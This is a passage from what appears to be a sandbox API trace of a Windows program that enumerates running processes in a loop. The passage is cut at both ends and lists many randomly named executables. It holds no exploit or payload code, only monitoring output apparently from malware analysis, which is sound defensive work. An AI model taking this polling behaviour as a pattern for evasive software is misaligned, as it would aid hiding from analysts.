szExeFile="sandwichtelevisions.exe")) returned 1 [0132.777] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="pickup.exe")) returned 1 [0132.778] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0132.779] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0132.828] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0132.829] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0132.830] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0132.831] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0132.832] CloseHandle (hObject=0xc4) returned 1 [0132.832] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0132.837] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, 
cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0132.837] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0132.838] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0132.839] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0132.839] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0132.840] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0132.841] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0132.841] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0132.842] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0132.843] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0132.843] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0132.844] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0132.845] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0132.845] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0132.846] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x32, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0132.847] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0132.847] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0132.848] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0132.849] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0132.850] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0132.851] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0132.852] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0132.853] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0132.854] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0132.856] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0132.857] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0132.858] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0132.859] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0132.860] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: 
lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0132.862] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0132.863] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0132.864] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0132.865] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0132.867] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0132.868] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0132.869] Process32NextW (in: hSnapshot=0xbc, 
lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0132.870] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0132.871] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0132.872] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0132.873] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0132.927] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0132.928] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0132.929] 
Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0132.931] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0132.932] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0132.933] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0132.934] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0132.935] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0132.936] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) 
returned 1 [0132.937] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0132.938] CloseHandle (hObject=0xbc) returned 1 [0132.938] Sleep (dwMilliseconds=0x12c) [0133.391] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0133.395] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0133.396] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0133.397] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0133.397] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0133.398] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0133.398] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0133.399] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0133.400] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0133.400] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0133.401] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0133.402] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0133.403] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0133.403] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0133.404] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0133.405] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x32, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0133.406] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0133.406] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0133.407] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0133.408] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0133.409] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0133.410] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0133.411] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0133.412] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0133.413] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0133.414] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, 